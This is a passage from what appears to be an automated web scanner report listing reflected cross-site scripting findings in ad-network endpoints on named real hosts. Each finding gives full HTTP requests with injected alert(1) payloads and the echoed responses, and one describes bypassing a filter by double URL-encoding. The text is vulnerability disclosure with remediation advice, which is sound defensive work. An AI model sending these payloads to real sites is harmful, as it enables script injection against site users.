bh="b!!!%*!!!?J!!!!(=$_d[!!(1-!!!!+=%=]S!!*lZ!!!!#=$Wj6!!*oY!!!!$=%@(m!!,WM!!!!#=$Wj6!!-?2!!!!)=%@(m!!-O3!!!!)=%@(m!!..X!!!!'=$L=p!!/GK!!!!+=%=]S!!/GR!!!!+=%=]S!!/Ju!!!!#=$_d[!!/K$!!!!%=%=]S!!/i,!!!!*=%@(m!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2)!!!!!*=%@(m!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!%=%=]S!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=$G$l!!J<J!!!!,=%=]S!!J<K!!!!,=%=]S!!J<O!!!!*=%=]S!!J<S!!!!,=%=]S!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OgU!!!!*=%@(m!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Phu!!!!$=%@(m!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwa!!!!)=%@(m!!Zwb!!!!$=%@(m!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!,=%=]S!!j,.!!<NC=$G$l!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!kl+!!!!$=%@(m!!kl,!!!!$=%@(m!!mL?!!!!#=%=pu!!mo!!!!!$=%@(m!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!tjQ!!!!$=%@(m!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#+]S!!!!*=%@(m!#-B#!!!!#=$G#-!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0Ei!!!!#=$GZg!#0[r!!!!#=#32s!#16I!!<NC=$G$l!#2%T!!!!$=#pxy!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#5(c!!!!#=%H`<!#6f-!!!!#=!iRq!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#8R^!!!!#=!iRa!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#C@M!!!!#=!iK@!#D![!!!!#=%if4!#D`%!!!!*=%=]S!#DpD!!!!#=$GZg!#Dri!!!!#=#ytJ!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!*=%=]S!#MTF!!!!'=%=]S!#MTH!!!!,=%=]S!#MTI!!!!,=%=]S!#MTJ!!!!,=%=]S!#Nyi!!!!#=!eq^!#O29!!!!(=%@(m!#O@L!!<NC=$G$l!#O@M!!<NC=$G$l!#O_8!!!!'=$$NV!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!#=#T`h!#SV*!!!!*=%@(m!#Sq>!!!!#='>m<!#T,d~~!#T^F!!!!#=!yv!!#UDQ!!!!,=%=]S!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Z8A!!!!$=%@(m!#Z8E!!!!)=%@(m!#]%`!!!!#=#33)!#]*j!!!!#=#pxY!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Z!!!!!(=%@(m!#]Z#!!!!$=%@(m!#]w)!!!!*=%=]S!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^0%!!!!*=%@(m!#^d6!!!!#=#33)!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-7!!!!)=%@(m!#`-Z!!!!$=%=]S!#`-[!!!!$=%=]S!#`U0!!!!$=%@(m!#`cS!!!!#=%id8!#a=6!!!!$=%@(m!#a=7!!!!$=%@(m!#a=9!!!!$=%@(m!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#bBg!!!!#=!iRr!#bTx!!!!#=%if4!#biv!!!!#=!iK0!#bj8!!!!#=#mS:!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8V!!!!(=%@(m!#c8X!!!!(=%@(m!#c8c!!!!(=%@(m!#c8i!!!!(=%@(m!#c8m!!!!(=%@(m!#c8p!!!!(=%@(m!#dCX!!!!%=!c>6!#dWf!!!!#=#mS:!#eDE!!!!#=#[2T!#eSD!!!!(=$_d[!#fBj!!!!)=%@(m!#fBk!!!!)=%@(m!#fBm!!!!)=%@(m!#fBn!!!!)=%@(m!#fFG!!!!#=#T_g!#fG)!!!!$=%@(m!#fG+!!!!$=%@(m!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g/7!!!!*=%@(m!#g=r!!!!$=%@(m!#gsl!!!!#=#mS:!#h.N!!!!#=#M8b!#k[Y!!!!#=#mS:!#k]0!!!!#=#mS:!#n`.!!!!#=$Fss!#nci!!!!#=$_di!#oTw!!!!#=#mS:!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#p]R!!!!#=$Fss!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#r-[!!!!#=!c8Z!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#slj!!!!#=#T_f!#tM)!!!!$=%=]S!#tM*!!!!$=$Ju9!#uQC!!!!*=%=]S!#uR3!!!!$=%@(m!#uR7!!!!)=%@(m!#uRN!!!!#=#mS:!#uRP!!!!#=#mS:!#uY<!!!!#=!yv$!#v,U!!!!#=#mS:!#v,Y!!!!#=#mS:!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#wYG!!!!#=$GXv!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xG5!!!!#=!yuk!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$#9a!!!!#=%j],!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#X4!!!!#=#%VO!$#yu!!!!*=%=]S!$$K<!!!!#=#$.g!$'/S!!!!#=#mS:!$'/Y!!!!#=#mS:!$'@Q!!!!$=%@(m!$(!P!!!!)=%@(m!$(:q!!!!#=$Fss!$(Gt!!!!'=%=]S!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$*hf!!!!$=%@(m!$+Dr!!!!#=#mS:!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,gE!!!!$=!iQt!$,jw!!!!#=#mS:!$-,y!!!!#=#mS:!$-kY!!!!#=#mS:!$-kv!!!!#=#mS:!$-rx!!!!#=$GXw!$.#F!!!!$=#qP5"; ih="b!!!!F!'4@g!!!!#=$KA3!)AU6!!!!#='htn!-5BI!!!!$=$J^*!-ru2!!!!#=$K9.!.#:A!!!!#=$L#)!.`.U!!!!#='htS!/[[9!!!!#=$L5r!/noe!!!!$=%=]O!0)2c!!!!#=$Jsh!0QGc!!!!#=$IeW!0Q]c!!!!#=%3V4!0eaS!!!!$=$Jui!19x/!!!!%=$L6>!1@m6!!!!$=%3V#!1UC$!!!!#=$G!=!1e75!!!!#=%3V6!1mH9!!!!#=!i98!1pQ3!!!!#=#32s!1qGe!!!!#=%1p'!23o_!!!!'=$Ks'!2817!!!!#=$L6.!282@!!!!$=$L5n!29j+!!!!6=$LYE!29j-!!!!#=#32k!29j/!!!!7=$LgV!29j6!!!!7=$Lth!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2A@,!!!!#=$Ju6!2GG7!!!!#=$J4M!2N-f!!!!B=$LJ>!2N7y!!!!$=$L=v!2NNL!!!!$=$L6,!2NO)!!!!$=$Ju2"; vuday1=!!!!#Gf(n`NBHr8H)J%d; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:03:29 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 13 Jun 2011 11:03:29 GMT
Pragma: no-cache
Content-Length: 4324
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.yieldmanager.com/imp?9f866"-alert(1)-"91e191e34f5=1&Z=160x600&s=1812134&_salt=880973763";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Ar
...[SNIP]...

4.44. http://ad.yieldmanager.com/v0/admeld-match [admeld_callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/v0/admeld-match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 963e2%2527%253balert%25281%2529%252f%252fb76a6b65442 was submitted in the admeld_callback parameter. This input was echoed as 963e2';alert(1)//b76a6b65442 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the admeld_callback request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /v0/admeld-match?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=420&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match963e2%2527%253balert%25281%2529%252f%252fb76a6b65442 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://fansided.com/category/nba/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; uid=uid=6add2924-95ac-11e0-b4d2-43a277710b2b&_hmacv=1&_salt=4204180274&_keyid=k1&_hmac=44aa44fb7ee602e1c39d69fa3dcf95912e945eeb; pv1="b!!!!'!$([W!(WdF!$Rc1!1mH9!%ei3!!!!$!?5%!)di=9!wVd.!%vS!!$iom!'t56~~~~~=!i98~~!$)FX!!#/o!!L9x!0eaS!%iUa!#a.5!?5%!'kH#8![:Z-!#5k@!'yJf~~~~~~=$Jui~~!!wjV!!#6W!#8='!/noe!#bl)!!!!$!?5%!'k>u7![:Z-!$>',!$FVq~~~~~~=%=]O=*PGYM.jTN!#Jl?!$5*F!$uj6!.#:D!%^Pa!!!!$!?5%!$8Ip,!@Dj0!'jh]~~~~~~~='htp=(g[2!!!(["; ih="b!!!!J!'4@g!!!!#=$KA3!)AU6!!!!#='htn!-5BI!!!!$=$J^*!-ru2!!!!#=$K9.!.#:A!!!!#=$L#)!.#:D!!!!#='htp!.`.U!!!!#='htS!/JVV!!!!#='i!H!/[[9!!!!#=$L5r!/noe!!!!$=%=]O!0)2c!!!!#=$Jsh!0QGc!!!!#=$IeW!0Q]c!!!!#=%3V4!0eaS!!!!$=$Jui!19x/!!!!%=$L6>!1@m6!!!!$=%3V#!1UC$!!!!#=$G!=!1e75!!!!#=%3V6!1mH9!!!!#=!i98!1pQ3!!!!#=#32s!1qGe!!!!#=%1p'!23o_!!!!'=$Ks'!2817!!!!#=$L6.!282@!!!!$=$L5n!29j+!!!!6=$LYE!29j-!!!!#=#32k!29j/!!!!7=$LgV!29j6!!!!7=$Lth!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2A@,!!!!#=$Ju6!2GG7!!!!#=$J4M!2N-f!!!!B=$LJ>!2N7y!!!!$=$L=v!2NNL!!!!$=$L6,!2NO)!!!!$=$Ju2!2`+,!!!!#='hw!!2gH2!!!!#='i#o"; vuday1=!!!!#?:rWHV9*LS4M6EqGf(n`NBHr8)FyuX; lifb=3i)1!_N/#u8_XTjv=)DUs169g; bh="b!!!%.!!!?J!!!!)='htq!!(1-!!!!,='htq!!*10!!!!#='hvv!!*lZ!!!!#=$Wj6!!*oY!!!!%='hvv!!,WM!!!!#=$Wj6!!-?2!!!!*='hvv!!..X!!!!'=$L=p!!/GK!!!!,='htq!!/GR!!!!,='htq!!/Ju!!!!$='htq!!/K$!!!!'='htq!!/i,!!!!+='hvv!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2)!!!!!+='hvv!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!'='htq!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=$G$l!!J<J!!!!-='htq!!J<K!!!!-='htq!!J<O!!!!+='htq!!J<S!!!!-='htq!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OgU!!!!+='hvv!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Phu!!!!%='hvv!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwa!!!!*='hvv!!Zwb!!!!%='hvv!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!-='htq!!j,.!!<NC=$G$l!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!kl+!!!!%='hvv!!kl,!!!!%='hvv!!mL?!!!!#=%=pu!!mo!!!!!%='hvv!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!tjQ!!!!%='hvv!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#+]S!!!!+='hvv!#-B#!!!!#=$G#-!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0Ei!!!!#=$GZg!#0[r!!!!#=#32s!#16I!!<NC=$G$l!#2%T!!!!$=#pxy!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#5(c!!!!#=%H`<!#6f-!!!!#=!iRq!#7(x!!!!#='hvv!#7)S!!!!#='hvv!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#8R^!!!!#=!iRa!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#C@M!!!!#=!iK@!#D![!!!!#=%if4!#D`%!!!!+='htq!#DpD!!!!#=$GZg!#Dri!!!!#=#ytJ!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!+='htq!#MTF!!!!'=%=]S!#MTH!!!!-='htq!#MTI!!!!-='htq!#MTJ!!!!-='htq!#Nyi!!!!#=!eq^!#O29!!!!)='hvv!#O@L!!<NC=$G$l!#O@M!!<NC=$G$l!#O_8!!!!'=$$NV!#Os.!!!!#='hvv!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!#=#T`h!#SV*!!!!+='hvv!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!#='htq!#UDQ!!!!-='htq!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Z8A!!!!%='hvv!#Z8E!!!!*='hvv!#Zgo!!!!#='hvv!#ZhT!!!!#='hvv!#]%`!!!!#=#33)!#]*j!!!!#=#pxY!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!#='htq!#]Uq!!!!#='htq!#]Uy!!!!#='htq!#]Z!!!!!)='hvv!#]Z#!!!!%='hvv!#]w)!!!!+='htq!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^0%!!!!+='hvv!#^d6!!!!#=#33)!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-7!!!!*='hvv!#`-Z!!!!%='htq!#`-[!!!!%='htq!#`cS!!!!#=%id8!#a=6!!!!%='hvv!#a=7!!!!%='hvv!#a=9!!!!%='hvv!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#bBg!!!!#=!iRr!#bTx!!!!#=%if4!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8V!!!!)='hvv!#c8X!!!!)='hvv!#c8c!!!!)='hvv!#c8i!!!!)='hvv!#c8m!!!!)='hvv!#c8p!!!!)='hvv!#dCX!!!!%=!c>6!#dWf!!!!#=#mS:!#eDE!!!!#=#[2T!#eSD!!!!(=$_d[!#fBj!!!!*='hvv!#fBk!!!!*='hvv!#fBm!!!!*='hvv!#fBn!!!!*='hvv!#fFG!!!!#=#T_g!#fG)!!!!%='hvv!#fG+!!!!%='hvv!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g/7!!!!+='hvv!#g=r!!!!%='hvv!#gS,!!!!#='i$2!#h.N!!!!#=#M8b!#k[Y!!!!#=#mS:!#n`.!!!!#=$Fss!#nci!!!!#=$_di!#oTw!!!!#=#mS:!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#p]R!!!!#=$Fss!#q+A!!!!#='htq!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#r-[!!!!#=!c8Z!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#slj!!!!#=#T_f!#t<c!!!!#='hvv!#tM)!!!!$=%=]S!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uR1!!!!#='hvv!#uR3!!!!%='hvv!#uR7!!!!*='hvv!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!#='htq!#wYG!!!!#=$GXv!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xG5!!!!#=!yuk!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!#='htq!$#X4!!!!#=#%VO!$#yu!!!!+='htq!$$K<!!!!#=#$.g!$$rQ!!!!#='hvv!$'/S!!!!#=#mS:!$'/Y!!!!#=#mS:!$'@Q!!!!%='hvv!$(!P!!!!*='hvv!$(:q!!!!#=$Fss!$(Gt!!!!'=%=]S!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$*hf!!!!%='hvv!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,gE!!!!$=!iQt!$,jw!!!!#=#mS:!$-'0!!!!#='i$,!$-rx!!!!#=$GXw!$.#F!!!!$=#qP5!$0V+!!!!#='htq"; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:22:04 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Cache-Control: private
Content-Length: 328
Content-Type: text/javascript
Age: 0
Proxy-Connection: close
Server: YTS/1.18.4

document.write('<img width="0" height="0" src="http://tag.admeld.com/match963e2';alert(1)//b76a6b65442?admeld_adprovider_id=420&external_user_id=3%3b0%3btPp_PCqix5Obrh3yjlbLU3gyTyCUWbWt4M5BfDPkgGVUdf8QWVFYFStNAfc-&expiration=1309173724" />
...[SNIP]...

4.45. http://admeld-match.dotomi.com/admeld/match [admeld_adprovider_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://admeld-match.dotomi.com
Path:	/admeld/match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e962d'%3balert(1)//6b165d444b3 was submitted in the admeld_adprovider_id parameter. This input was echoed as e962d';alert(1)//6b165d444b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /admeld/match?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=78e962d'%3balert(1)//6b165d444b3&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DotomiUser=330100732990473967$0$335422886; DotomiNet=2$DjQqblZ1RXZKA2VdBAN%2BXAJHKSpAJ24SQR0PVVBLY3Jma1xARWZBXQAFW0dLSkdZYmFde25mXndRLwVZaVwXVzMdb1F%2BfgB7AEQJWmhQU0lnfmN%2BCxxQQQMwAARVT0VLQl5jalx9amdWd0J0VlgmDg4BbwFCF3B6B3YHQgtVYVNQSGF6cixKTAgJVwpKRjlES05GU2VhW3tvYlN%2BQnhGBmc%3D

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:21:06 GMT
X-Name: rtb-o07
Cache-Control: max-age=0, no-store
Content-Type: text/javascript
Connection: close
Content-Length: 199

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=78e962d';alert(1)//6b165d444b3&external_user_id=WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP&expiration=1309173666" alt="" />');

4.46. http://admeld-match.dotomi.com/admeld/match [admeld_callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://admeld-match.dotomi.com
Path:	/admeld/match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e201a'%3balert(1)//d0668213c16 was submitted in the admeld_callback parameter. This input was echoed as e201a';alert(1)//d0668213c16 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /admeld/match?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=78&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matche201a'%3balert(1)//d0668213c16 HTTP/1.1
Host: admeld-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DotomiUser=330100732990473967$0$335422886; DotomiNet=2$DjQqblZ1RXZKA2VdBAN%2BXAJHKSpAJ24SQR0PVVBLY3Jma1xARWZBXQAFW0dLSkdZYmFde25mXndRLwVZaVwXVzMdb1F%2BfgB7AEQJWmhQU0lnfmN%2BCxxQQQMwAARVT0VLQl5jalx9amdWd0J0VlgmDg4BbwFCF3B6B3YHQgtVYVNQSGF6cixKTAgJVwpKRjlES05GU2VhW3tvYlN%2BQnhGBmc%3D

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:21:08 GMT
X-Name: rtb-o04
Cache-Control: max-age=0, no-store
Content-Type: text/javascript
Connection: close
Content-Length: 199

document.write('<img src="http://tag.admeld.com/matche201a';alert(1)//d0668213c16?admeld_adprovider_id=78&external_user_id=WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP&expiration=1309173668" alt="" />');

4.47. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://admeld.adnxs.com
Path:	/usersync

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30caf'-alert(1)-'347d3038231 was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /usersync?calltype=admeld&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=19330caf'-alert(1)-'347d3038231&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImdYCEAoYBCAEKAQw0ICz7wQQ0ICz7wQYAw..; anj=Kfw)k>JS.m*cOUs+'x*9/fov!U?-XD/@T`Eo*G>j9p6Kr5j'_7CgzlO:Fvgpkp?4[v=vwq`X_dWeNwpF6L1pOp0@m=r]@w@qmB`wa.gANc?%+]4$8<B8`4]:lCT3*9!qMQcil4XYmQ8WsDzIs#O67VmMmo)bHHWI6ZNYX0a_OT4xLEJYuSASUz$!y`uCnDKOlRBQu-`F+^8q^'[id[S7lqL3SyxsCSr9%@'BHMj:vbN!%A^*8GRvRZzGKBXAg>XGd5%ZV[>#w8#[npwDqVVGb#*ghU%C%7=MVqC2pmBp[Pxux0V[OL(pbe9FyrT[y*nF0xYV^1(9^IA4Y5vQ.63A13Xwt4yzbGW.9sLBw[mW8s6J_PV-8*MjghNoq:MVp!i%g:7B+-LBCkWVYq_!7QJ2ltk?f[Ob[1Nft-Sn1ma>DD[PDURe)51Ox>N/si@JJM]yC]x.!/L]TZ*wZi@6w8U'aoF=ae0W!Uew.vN=.wG!rYe0n(oapLJIa%K^mCY1KfotBEb; sess=1; uuid2=3420415245200633085

Response

4.48. http://admeld.adnxs.com/usersync [admeld_callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://admeld.adnxs.com
Path:	/usersync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9cb4b'-alert(1)-'b719ccbe853 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /usersync?calltype=admeld&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match9cb4b'-alert(1)-'b719ccbe853 HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
